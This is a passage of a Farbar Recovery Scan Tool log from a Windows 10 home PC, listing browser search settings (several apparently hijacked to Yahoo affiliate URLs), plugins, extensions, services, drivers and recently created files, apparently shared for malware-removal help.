SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1001 -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyB0FtCtD0CtA0B0CtGyBzzyD0CtG0EyDtBzytGtAzzzyyBtG0EyDtByDyEyCyE0FtCtC0B0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1057114629%26a%3Dwncy_omxmedia_15_51_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyB0FtCtD0CtA0B0CtGyBzzyD0CtG0EyDtBzytGtAzzzyyBtG0EyDtByDyEyCyE0FtCtC0B0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1057114629%26a%3Dwncy_omxmedia_15_51_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {6B023522-B37A-4323-9007-FF11E4F94C80} URL = hxxp://www.bing.com/search?FORM=WLETDF&PC=WLEM&q={searchTerms}&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEzztN1L2XzutAtFtCyEtFtDtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyE0EzytAyEzzzz0AtGyD0A0CyEtGyByEyCtCtGyEyB0DyDtGzy0Ezz0DyByDyCtCzytB0Czz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1118004757%26a%3Dwny_omxmedia_15_51_ssg03%26os%3DWindows%2B10%2BHome&p={searchTerms}
BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2015\pmbxie.dll [2015-12-18] (Bitdefender)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-12-15] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_71\bin\ssv.dll [2016-01-21] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-21] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_71\bin\jp2ssv.dll [2016-01-21] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2015\Antispam32\pmbxie.dll [2015-12-18] (Bitdefender)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-12-17] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2015\pmbxie.dll [2015-12-18] (Bitdefender)
Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2015\Antispam32\pmbxie.dll [2015-12-18] (Bitdefender)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-08-22] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\dtplugin\npDeployJava1.dll [2016-01-21] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\plugin2\npjp2.dll [2016-01-21] (Oracle Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32.dll [2016-01-31] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-08-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-05] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-05] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2014-11-14] ()
FF Plugin HKU\S-1-5-21-1436452318-2580999886-2786755032-1003: @citrixonline.com/appdetectorplugin -> C:\Users\sesay\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-01-27] (Citrix Online)
FF HKLM\...\Firefox\Extensions: [bdwteffv19@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff
FF Extension: Bitdefender Wallet - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff [2015-12-20]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext
FF Extension: Bitdefender Antispam Toolbar - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext [2015-08-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [firefox@bho.com] - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt
FF Extension: HP SimplePass - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt [2015-03-25] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv19@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext
 
Chrome: 
=======
CHR HomePage: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
CHR StartupUrls: Default -> "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome"
CHR DefaultSearchURL: Default -> hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
CHR DefaultSearchKeyword: Default -> Search Provided by Yahoo.com
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms}
CHR Profile: C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-10]
CHR Extension: (Google Docs) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-10]
CHR Extension: (Google Drive) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-10]
CHR Extension: (YouTube) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-10]
CHR Extension: (Google Search) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-10]
CHR Extension: (Bitdefender Wallet) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\fabcmochhfpldjekobfaaggijgohadih [2015-11-10]
CHR Extension: (Google Sheets) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-10]
CHR Extension: (Google Docs Offline) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-10]
CHR Extension: (Chrome Web Store Payments) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-10]
CHR Extension: (Gmail) - C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-10]
CHR HKLM-x32\...\Chrome\Extension: [fabcmochhfpldjekobfaaggijgohadih] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2286848 2015-10-17] (Broadcom Corporation.)
S3 BdDesktopParental; C:\Program Files\Bitdefender\Bitdefender 2015\bdparentalservice.exe [78144 2015-11-11] (Bitdefender)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2787512 2015-12-22] (Microsoft Corporation)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [347200 2015-01-15] (WildTangent)
U2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2015-12-30] (Hi-Rez Studios) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [373720 2016-01-19] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [158496 2014-10-10] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [103424 2015-01-30] (Softex Inc.) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [316152 2016-01-15] (Realtek Semiconductor)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2015\updatesrv.exe [100816 2015-11-11] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2015\vsserv.exe [1561344 2015-12-18] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [1600512 2015-11-11] (BitDefender)
R3 avchv; C:\Windows\system32\DRIVERS\avchv.sys [282000 2015-12-07] (BitDefender)
R3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [775424 2015-11-11] (BitDefender)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [208176 2015-10-17] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7533784 2015-02-14] (Broadcom Corporation)
R1 BdfNdisf; C:\Windows\System32\DriverStore\FileRepository\netlwf.inf_amd64_47566fa3371097e5\bdfndisf6.sys [98768 2014-12-15] (BitDefender LLC)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [115800 2015-12-18] (BitDefender LLC)
S3 bdfwfpf_pc; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf_pc.sys [130656 2015-12-18] (Bitdefender SRL)
R1 BDVEDISK; C:\Windows\system32\DRIVERS\bdvedisk.sys [87912 2015-12-18] (BitDefender)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
R3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
R3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
R0 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [160032 2015-10-01] (BitDefender LLC)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [129312 2014-10-10] (Intel Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [477272 2015-10-01] (BitDefender S.R.L.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-31 19:56 - 2016-01-31 19:57 - 00034498 _____ C:\Users\sesay\Desktop\FRST.txt
2016-01-31 19:54 - 2016-01-31 19:54 - 02370560 _____ (Farbar) C:\Users\sesay\Desktop\FRST64.exe
2016-01-31 19:44 - 2016-01-31 19:44 - 00000000 ____D C:\Users\sesay\Documents\My Games
2016-01-31 19:19 - 2016-01-31 19:19 - 00002113 _____ C:\Users\Public\Desktop\Hi-Rez Diagnostics and Support.lnk
2016-01-31 19:19 - 2016-01-31 19:19 - 00002106 _____ C:\Users\Public\Desktop\Paladins.lnk
2016-01-31 19:19 - 2016-01-31 19:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hi-Rez Studios
2016-01-31 19:19 - 2016-01-31 19:19 - 00000000 ____D C:\ProgramData\Hi-Rez Studios
2016-01-31 19:19 - 2016-01-31 19:19 - 00000000 ____D C:\Program Files (x86)\Hi-Rez Studios
2016-01-31 19:18 - 2016-01-31 19:18 - 51404448 _____ (Hi-Rez Studios) C:\Users\sesay\Downloads\InstallPaladins.exe
2016-01-31 19:14 - 2016-01-31 19:16 - 232848723 _____ C:\Users\sesay\Downloads\Ninety9Lives 97 Level Up.zip
2016-01-31 19:11 - 2016-01-31 19:11 - 00000000 ___HD C:\OneDriveTemp
2016-01-31 16:41 - 2016-01-31 16:41 - 00000000 ____D C:\Users\abang\AppData\Local\NetworkTiles
2016-01-30 20:49 - 2016-01-30 20:50 - 00000000 ____D C:\WINDOWS\LastGood
2016-01-28 22:01 - 2016-01-28 22:02 - 00000000 ____D C:\tmp
2016-01-27 19:48 - 2016-01-27 19:48 - 00034027 _____ C:\Users\sesay\Desktop\internet.txt
2016-01-27 18:24 - 2016-01-27 19:49 - 00060528 _____ C:\Users\sesay\Desktop\New Text Document.txt
2016-01-27 17:51 - 2016-01-31 19:56 - 00000000 ____D C:\FRST
2016-01-27 15:17 - 2016-01-16 01:23 - 08728920 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-01-27 15:17 - 2016-01-16 01:20 - 06971752 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-01-27 15:17 - 2016-01-16 01:20 - 06600904 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-01-27 15:17 - 2016-01-16 01:17 - 21125400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-01-27 15:17 - 2016-01-16 01:16 - 05238360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-01-27 15:17 - 2016-01-16 01:13 - 01998168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-01-27 15:17 - 2016-01-16 01:13 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-01-27 15:17 - 2016-01-16 01:09 - 01089880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-01-27 15:17 - 2016-01-16 00:45 - 16986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-01-27 15:17 - 2016-01-16 00:44 - 22394368 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-01-27 15:17 - 2016-01-16 00:43 - 00097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttpcom.dll
2016-01-27 15:17 - 2016-01-16 00:42 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscoreext.dll
2016-01-27 15:17 - 2016-01-16 00:40 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-01-27 15:17 - 2016-01-16 00:38 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-01-27 15:17 - 2016-01-16 00:35 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-01-27 15:17 - 2016-01-16 00:34 - 00610816 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2016-01-27 15:17 - 2016-01-16 00:34 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttpcom.dll
2016-01-27 15:17 - 2016-01-16 00:33 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll
2016-01-27 15:17 - 2016-01-16 00:32 - 24602624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
